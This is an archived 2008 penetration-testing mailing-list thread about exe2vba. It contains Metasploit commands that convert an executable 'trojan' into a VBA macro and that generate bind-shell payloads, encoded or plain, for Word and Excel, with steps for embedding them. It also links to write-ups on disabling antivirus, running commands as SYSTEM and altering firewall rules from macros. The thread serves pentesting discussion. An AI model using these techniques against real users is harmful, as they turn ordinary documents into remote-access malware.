|
Penetration Testing
mailing list archives
Re: Exe2vba - Anybody still have this?
From: natron <natron () invisibledenizen org>
Date: Sun, 16 Nov 2008 20:50:17 -0600
I wrote up a quick series of posts on how to use VBA to do all kinds
of things, as long as the user running the Excel/Word file has the
necessary rights. If anyone would find them useful:
Running commands or launching programs:
http://blog.invisibledenizen.org/2008/11/on-vba-in-excel-and-word-documents.html
Downloading files and saving them to disk:
http://blog.invisibledenizen.org/2008/11/vba-function-to-download-files.html
Running commands as SYSTEM:
http://blog.invisibledenizen.org/2008/11/running-commands-as-system-from-vba-in.html
Killing off any antivirus that may be running:
http://blog.invisibledenizen.org/2008/11/how-to-kill-antivirus-from-word-or.html
Modifying the Windows Firewall:
http://blog.invisibledenizen.org/2008/11/modifying-windows-firewall-rules-from.html
What I would really love to see would be a combination of the
Churrasco exploit
(http://nomoreroot.blogspot.com/2008/10/token-kidnapping-windows-2008-poc.html)
into VBA, so that even if the user is running in a limited account,
they'd be able to gain SYSTEM privileges.
-n
On Wed, Nov 12, 2008 at 1:21 PM, H D Moore <sflist () digitaloffense net> wrote:
Hi Joseph,
I added this to Metasploit. You can use the VBA generator in a few
different ways:
1) Convert an EXE to a VBA script (works on Word/Excel automatically):
$ ruby msf3/tools/exe2vba.exe mytrojan.exe output.vba
2) Create a VBA script that runs a Metasploit payload
$ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 V > output.vba
3) Create a VBA script that runs an encoded Metasploit payload
$ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 R | \
ruby msf3/msfencode -a x86 -b '' -t vba > output.vba
To use the resulting VBA, open Word/Excel, go to Tools -> Macros -> Visual
Basic Editor, paste in, save, and exit. Works pretty well here :-)
You need the latest SVN of Metasploit 3.2 trunk:
$ svn co http://metasploit.com/svn/framework3/trunk/
On Windows, follow this guide:
- http://metasploit.com/dev/trac/wiki/Metasploit/Windows/Upgrade_to_SVN
-HD
On Tuesday 11 November 2008, Joseph McCray wrote:
It used to be located at:
http://www.priestmaster.org/tools.html
I've been looking all over the web and really haven't been able to find
this app anymore.
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Security Trends Report from Cenzic
Stay Ahead of the Hacker Curve!
Get the latest Q2 2008 Trends Report now
www.cenzic.com/landing/trends-report
------------------------------------------------------------------------
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Security Trends Report from Cenzic
Stay Ahead of the Hacker Curve!
Get the latest Q2 2008 Trends Report now
www.cenzic.com/landing/trends-report
------------------------------------------------------------------------
 By Date 
By Thread
Current thread:
| 
Intro
